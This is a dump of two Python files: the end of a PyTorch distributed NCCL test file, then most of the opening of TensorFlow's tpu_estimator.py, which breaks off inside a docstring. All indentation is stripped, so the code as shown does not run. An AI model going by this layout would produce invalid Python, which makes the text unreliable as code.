with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import signal
import threading
import time
import traceback
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops():
# Gets the variables back from TPU nodes. This means the variables updated
# by TPU will now be *synced* to host memory.
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU
system before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(
collections.namedtuple('TPUEstimatorSpec', [
'mode',
'predictions',
'loss',
'train_op',
'eval_metrics',
'export_outputs',
'scaffold_fn',
'host_call'
])):
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, 'predictions, 'loss', 'train_op', and
'export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
@{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with @{tf.contrib.summary.create_file_writer}.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=hooks,
evaluation_hooks=hooks,
prediction_hooks=hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.' % self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._session_cancel_timer = None
self._feed_error = None
self._finished = False
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _log_error(self, session, error):
"""Log an infeed or outfeed error.
This logs a short error message immediately, and schedules a timer to
emit the full stack trace and error message after a short period of time.
If the main session has terminated by the time the timer triggers, we
assume the real source of the error was from the main session and avoid
emitting a stack trace for the infeed.
Args:
session: `tf.Session`, session to be terminated error: exception that
triggered logging.
error: the Exception to log.
"""
logging.warning(
'\n\n'
'Error occurred during infeed/outfeed. This may be due to a compile '
'error in the main session. Waiting for a short time for the main '
'session to come back.\n\n%s', error)
self._feed_error = traceback.format_exc()
# If we've already encountered a feed error, don't schedule another
# cancellation op.
if self._session_cancel_timer:
return
def _cancel_session():
# Close the session to avoid the main thread from hanging. If input
# pipeline triggers any error, the infeed thread dies but the main thread
# for TPU computation waits for the infeed enqueue forever. Close the
# Session to cancel the main thread Session.run execution.
#
# We sleep for a few seconds before closing to give some time
# for the TPU compilation error, if any, propagating, from TPU to CPU
# host. Compilation errors should be reported by the main thread so that
# the program can be interrupted and users can take action. Due to a race
# condition, the infeed thread might see an error first. Closing the
# session here immediately would result in a session cancellation
# exception in the main thread, instead of the expected compile error.
# User code that depends on having the proper exception type will
# therefore be confused.
time.sleep(5)
# If the main session is still running, the infeed/outfeed errors are
# legitimate, and should be logged.
if not self._finished and self._feed_error:
logging.error('Feed error: %s', self._feed_error)
logging.error('Closing session. A RuntimeError should follow.')
session.close()
self._session_cancel_timer = threading.Thread(target=_cancel_session)
self._session_cancel_timer.daemon = True
self._session_cancel_timer.start()
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('%s thread sleeping for %d seconds.', self._name,
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('%s thread starting after sleep', self._name)
try:
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
try:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info('Init TPU system')
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
logging.info('Start infeed thread controller')
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
logging.info('Start outfeed thread controller')
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
def before_run(self, run_context):
self._feed_error = None
# Wait for the cancellation timer to complete before continuing.
if self._session_cancel_timer:
self._session_cancel_timer.join()
self._session_cancel_timer = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
if self._session_cancel_timer:
logging.warning('Feed error occurred; waiting for message.')
self._session_cancel_timer.join()
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
logging.info('Stop output thread controller')
self._outfeed_controller.join()
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
inputs = _Inputs.from_input_fn(input_fn())
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
# TODO(ylc): Refactoring the code to merge the tpu ordinal logic here and the
# _TPUContext.tpu_ordinal_function. We should either introduce another
# abstraction or a different helper method.
def _tpu_ordinal_function_impl(shard_index_in_host):
# We put both enqueue/dequeue op at tpu.core(0) in each replica.
replica = ctx.device_assignment.lookup_replicas(
host_id, (0, 0, 0))[shard_index_in_host]
return ctx.device_assignment.tpu_ordinal(replica=replica)
if ctx.model_parallelism_enabled:
tpu_ordinal_function = _tpu_ordinal_function_impl
else:
tpu_ordinal_function = None
def enqueue_ops_fn():
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels, signals)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
del host_id # unused
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
# TODO(b/XXX): Add predict support for PER_HOST_V2
raise TypeError('Most PREDICT not yet supported in PER_HOST_V2 mode.')
hooks.append(inputs.dataset_initializer_hook())
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in `_TPUContext`, it
invokes `input_fn` for all cores (usually multi-host TPU training) or for one
host (usually for single-host TPU evaluation), and sends all `features` and
`labels` returned by `input_fn` to TPU infeed. For per-core invocation,
`features` and `labels` are piped to infeed directly, one tuple for each
core. For per-host invocation, `features` and `labels` are split at host
(with respect to `batch_axis`) and piped to all cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`,
and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`.
TPU infeed/outfeed library expects flattened tensor list. So, `features` and
`labels` need to be flattened, before infeed enqueue, and the structure of
them needs to be recorded, in order to restore them after infeed dequeue.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self):
# Holds the structure of inputs
self._feature_names = []
self._label_names = []
self._has_labels = False
self._signals_helper = None
# Internal state.
self._initialized = False
def has_labels(self):
return self._has_labels
def validate_and_record_structure(self, features, labels, signals=None):
"""Validates and records the structure of features` and `labels`."""
def _extract_key_names(tensor_or_dict):
if tensor_or_dict is None:
return []
return sorted(tensor_or_dict.keys()) if isinstance(
tensor_or_dict, dict) else []
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if signals is not None and self._signals_helper is None:
# Record signals helper.
self._signals_helper = _SignalsHelper(signals)
if self._initialized:
# Verify the structure is same. The following should never happen.
assert feature_names == self._feature_names, 'feature keys mismatched'
assert label_names == self._label_names, 'label keys mismatched'
assert has_labels == self._has_labels, 'label presence mismatched'
else:
# Record structure.
self._initialized = True
self._feature_names = feature_names
self._label_names = label_names
self._has_labels = has_labels
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
flattened_inputs = []
if self._feature_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend(
[features[name] for name in self._feature_names])
else:
flattened_inputs.append(features)
if labels is not None:
if self._label_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend([labels[name] for name in self._label_names])
else:
flattened_inputs.append(labels)
if signals is not None:
flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals))
return flattened_inputs
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
expected_num_features = (
len(self._feature_names) if self._feature_names else 1)
if self._has_labels:
expected_num_labels = (
len(self._label_names) if self._label_names else 1)
else:
expected_num_labels = 0
expected_num_signals = (
self._signals_helper.num_signals if self._signals_helper else 0)
expected_num_tensors = (
expected_num_features + expected_num_labels + expected_num_signals)
if expected_num_tensors != len(flattened_inputs):
raise ValueError(
'The number of flattened tensors mismatches expected num. '
'Expected {}, got {}'.format(expected_num_tensors,
len(flattened_inputs)))
if self._feature_names:
unflattened_features = dict(
zip(self._feature_names, flattened_inputs[:expected_num_features]))
else:
# Single tensor case
unflattened_features = flattened_inputs[0]
if expected_num_labels == 0:
unflattened_label = None
elif self._label_names:
label_list = flattened_inputs[
expected_num_features:expected_num_features + expected_num_labels]
unflattened_label = dict(zip(self._label_names, label_list))
else:
# Single tensor case.
unflattened_label = flattened_inputs[expected_num_features]
signals = None
if expected_num_signals != 0:
tensor_list_for_signals = flattened_inputs[
expected_num_features + expected_num_labels:]
signals = self._signals_helper.unflatten(tensor_list_for_signals)
return _Inputs(unflattened_features, unflattened_label, signals=signals)
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_TPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
